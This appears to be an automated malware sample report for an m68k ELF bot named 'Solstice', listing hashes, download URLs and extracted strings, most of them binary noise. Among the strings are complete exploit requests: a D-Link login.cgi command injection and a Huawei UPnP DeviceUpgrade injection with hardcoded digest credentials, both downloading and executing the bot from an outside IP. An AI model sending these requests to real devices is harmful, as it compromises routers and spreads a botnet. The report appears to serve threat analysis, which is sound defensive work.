Sample details: 1f4f2a3481c433d449ad85a7ab3b26f1 --

Hashes
MD5: 1f4f2a3481c433d449ad85a7ab3b26f1
SHA1: e37a22473c81b94cd29b97936aea781e79dd2a5e
SHA256: d9178e440507ccd8beaf61e849960da40a307ea808190eb64b12ea08887937f9
SSDEEP: 1536:gWC2LD9iJgYNqUX4pB1JJOLlyKRpK8Ena80+L:gT2bVUX4pHJJkkB84P
Details
File Type: ELF
Yara Hits
Source
http://185.101.105.162/bins/Solstice.m68k
http://185.101.105.162:80/bins/Solstice.m68k
http://185.101.105.163/bins/Solstice.m68k
Strings
		N^NuNV
N^NuNV
N^NuNV
N^NuNV
 OHWHQHy
?>./-t$/-|
/A-THo-TB
 7- ,D
B7	 (CHo(CN
Ho-hHx
dHo-tN
/@-dHo-dHo-`Hx
/BQxHoQxB
HoPpHoP
XZHw	 (la
Hw	 (xa
fHo(|a
XZHw	 (
Hw	 (xa
Hw	 (xa
XZHw	 (
 Ho(ha
Hw	 (pa
Hw	 (|a
 Ho(ha
Hw	 (pa
THo(ta
XZHw	 (|a
$Ho(ha
Hw	 (pa
lHo(la
Hw	 (ta
Hw	 (la
Hw	 (|a
$Ho(ha
Hw	 (pa
Hw	 (|N
Hw	 (lN
XZHw	 (lN
Hw) (xHx
Hw	 (lN
IsHw	 (pN
Hw	 (pa
I|Hw	 (|a
Hw	 (pa
Hw	 (pM
THw	 (pN
gTHo(hN
fFth D 
fFth C 
N^NuNV
N^NuNV
yp$C$.
4N^Nu#
N^NuNV
n&NBca
o2$	"D(
: G1|	
( SHx@
N^Nu o
NuNq o
b(p7 B
$NuNuNV
p7N@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
p@N@-@
N^NuNV
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
pUN@-@
N^NuNV
N^NuNV
pBN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNuNV
 @N^NuNuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
HN^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
RN^NuNV
NqNuNV
"	pfN@-@
N^NuNuNV
N^NuNV
N^NuNuNV
"	plN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
 @N^NuNuNV
p+N@-@
N^NuNuNV
LN^NuNV
DN^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
N^NuNuNV
N^NuNV
NqNuNV
N^NuNV
p-N@-@
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
PN^NuPOST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
fgtf/wavmeh'
iemjpemjav
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
?/dev/null
.shstrtab
.rodata
.ctors
.dtors